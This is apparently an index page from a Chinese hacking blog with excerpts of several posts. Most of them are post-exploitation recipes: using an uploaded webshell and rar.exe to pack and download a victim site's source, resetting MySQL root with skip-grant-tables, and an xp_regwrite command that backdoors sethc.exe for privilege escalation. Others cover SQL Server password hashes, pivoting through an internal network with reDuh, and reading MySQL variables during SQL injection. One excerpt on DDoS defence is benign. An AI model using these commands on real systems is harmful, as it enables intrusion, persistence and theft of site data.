rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了rar.exe一切变的简单了!
好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar.exe,虽然program files目录有,但是有时执行不了。rar.exe体积200K,呵呵!将就下。在CMDSHELL执行:\1\Rar.exe a -k -r -s -m1 E:\web\1.rar E:\web\。我来介绍下吧,"D:\1\rar.exe"是你上传的rar.exe,后面参数我会给大家放在下面;"E:\web\1.rar"是你压缩的文件存放的位置(在shell中一定要选能写的目录);"E:\web\"是你要打包的目录。很简单吧?以后在没有得到服务器,大家可以尝试我介绍的方法,下载整站源码。
...
- 添加新评论
- 阅读次数:
打开CMD首先停止mysql服务
net stop mysql
进入mysql安装目录下的bin文件夹,然后输入
mysqld-nt --skip-grant-tables
跳过密码检测
然后另外新打开一个cmd窗口
输入mysql 直接回车可以以root权限进入mysql
use mysql
update user set password=password("新密码") where user="root";
...- 添加新评论
- 阅读次数:
网上找的一个图。。觉得还是可以。但我认为要成为一名研究型的黑客,数学是必备的基础。特别数论、矩阵对分析密码学很有帮助。感觉还有的地方不全,如网络安全学习那块他没有写,这块是必备的。 流程图看起简单,其实要学到后面的境界很难。也不知道以后会不会再深入得去学习计算机了。有时间给以前搜的一篇关于黑客发展的文章贴出来。
...- 添加新评论
- 阅读次数:
sa权限如果xp_cmdshell不可用时,可以尝试用xp_regwrite写注册表,替换sethc.exe实现提权。
代码如下:sa提权技巧之xp_regwrite 替换sethc.exe
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'
- 添加新评论
- 阅读次数:
所有SQLSERVER账号的密码都经过了pwdencrypt这个函数的加密。
比如:
SQL代码
select pwdencrypt('ninty');
0x01001F32B351238BEEE4411C2006F5D76C7FE66AABC977CB5A803395B514A1CDD5A8DE14C3250AAF89A8B4EA4633
(因为加密算法跟时间有关,所以每次执行所得的值不一样。)
...
- 添加新评论
- 阅读次数:
对某款国家级内容过滤系统Dos安全缺陷分析
Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2009-1-2
From: http://www.80sec.com/release/dos-with-XXX.txt
...
- 添加新评论
- 阅读次数:
Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul
最近运气不好,拿下的某内网,Server区全部不能外连,没法反弹socks出来,导致渗透内网其它网段的时候很辛苦。其中一台MSSQL和Web是分离的,服务器虽然拿下了,但有时候上去执行一些管理员权限才能执行的命令时(该Server是IIS6+ASPX,权限不够),只能用reDuh上3389,但reDuh实在是太慢了,我现在用reDuh连终端的时候都设置的最低分辨率(640 x 480)和最低色彩(256色),即使这样好不容易上去了敲个命令还要等半天,实在让人抓狂.....
...
- 添加新评论
- 阅读次数:
当注射mysql库的输入点的时候,我们可以通过version()/user()/database()/password()等内置函数来得到mysql的相关信息,其实我们在注射的时候可以利用mysql内置的变量来得到更多的mysql信息
其中version()可以写成@@version来把version当做变量来读取,这样一样可以得到,其他的内置是不可以写成变量的形式.
大家都应该用过利用pangolin来注入mysql库的注射点,认真的朋友都应该知道可以的得到basedir和datadir这两个变量的信息,其实还有更多的变量在注射的时候可以利用
...
- 添加新评论
- 阅读次数:
- 添加新评论
- 阅读次数:
防范DDOS攻击并不一定非要用防火墙。一部份DDOS我们可以通过DOS命令netstat -an more或者网络综合分析软件:sniff等查到相关攻击手法、如攻击某个主要端口、或者对方主要来自哪个端口、对方IP等。这样我们可以利用 w2k自带的远程访问与路由或者IP策略等本身自带的工具解决掉这些攻击。做为无法利用这些查到相关数据的我们也可以尝试一下通过对服务器进行安全设置来防范DDOS攻击。如果通过对服务器设置不能有效解决,那么就可以考虑购买抗DDOS防火墙了。其实从操作系统角度来说,本身就藏有很多的功能,只是很多是需要我们慢慢的去挖掘的。这里我给大家简单介绍一下如何在Win2000环境下通过修改注册表,增强系统的抗DoS能力。
...
- 添加新评论
- 阅读次数: